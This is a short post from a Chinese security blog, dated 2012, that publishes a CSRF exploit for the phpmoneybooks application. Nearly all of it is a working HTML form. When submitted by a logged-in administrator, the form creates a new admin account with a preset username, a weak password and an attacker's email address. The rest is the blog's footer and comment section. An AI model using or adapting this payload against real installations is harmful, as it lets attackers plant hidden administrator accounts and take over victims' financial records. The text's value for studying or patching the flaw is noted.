phpmoneybooks CSRF Vulnerability (Add Admin)

Exploit:
<html>
<head>
<title>phpmoneybooks [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>

本文固定链接: https://www.unhonker.com/technical/590.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年05月13日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: phpmoneybooks CSRF Vulnerability (Add Admin) | 90' s Blog|关注网络信息安全

phpmoneybooks CSRF Vulnerability (Add Admin):等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!